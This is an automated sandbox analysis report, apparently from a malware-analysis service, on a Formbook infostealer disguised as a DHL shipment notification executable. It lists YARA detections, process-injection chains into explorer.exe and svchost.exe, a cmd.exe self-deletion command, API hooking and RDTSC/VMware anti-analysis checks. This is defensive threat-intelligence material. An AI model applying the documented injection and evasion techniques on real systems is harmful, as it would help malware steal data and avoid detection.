          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe, Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: String function: 0302B150 appears 87 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: String function: 00D72400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: String function: 00D74599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 2_2_0041A320 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 2_2_0041A3D0 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 2_2_0041A450 NtClose
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 2_2_0041A500 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 2_2_0041A31F NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 2_2_0041A3CE NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 2_2_0041A4FB NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030699A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030696D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030696E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030695D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0306A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069A10 NtQuerySection
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069A20 NtResumeThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030699D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0306B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030698A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030698F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0306A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069760 NtOpenProcess
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0306A770 NtOpenThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030697A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0306AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_03069560 NtWriteFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_030695F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0239A320 NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0239A3D0 NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0239A450 NtClose
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0239A500 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0239A31F NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0239A3CE NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 17_2_0239A4FB NtAllocateVirtualMemory
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeVirustotal: Detection: 42%
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile read: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeJump to behavior
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile created: C:\Users\user\AppData\Local\Temp\nsk2670.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\mvbaz\xgpqcu\xwqn\f27888ddf02c4c6aa9eb1b8f5b3a0302\rlifld\nwoxnqyr\Release\nwoxnqyr.pdb source: DHL SHIPMENT NOTIFICATION 1146789443.exe, 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp, aeokw.exe, 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000001.00000000.249383523.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, svchost.exe, 00000011.00000002.515611102.000000000352F000.00000004.10000000.00040000.00000000.sdmp, nsk2671.tmp.0.dr, aeokw.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D72445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00401026 push 5DA8CC51h; iretd
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041E8F5 pushad ; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0040E32E push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D475 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D4C2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D4CB push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D52C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D72445 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0307D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0238E32E push ebx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239E8F5 pushad ; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D475 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D4CB push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D4C2 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D52C push eax; ret
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile created: C:\Users\user\AppData\Local\Temp\aeokw.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE6
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 1_2_00D71890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 0000000002389904 second address: 000000000238990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 0000000002389B6E second address: 0000000002389B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 6084 | Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 2312 | Thread sleep time: -40000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 2_2_00409AA0 rdtsc
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 7.7 %
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Code function: 0_2_004069A4 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Code function: 0_2_0040290B FindFirstFileW,
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | API call chain: ExitProcess graph end node
Source: explorer.exe, 00000005.00000000.346368110.00000000051AC000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.305531432.000000000546A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: =b\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.303730790.00000000051D2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
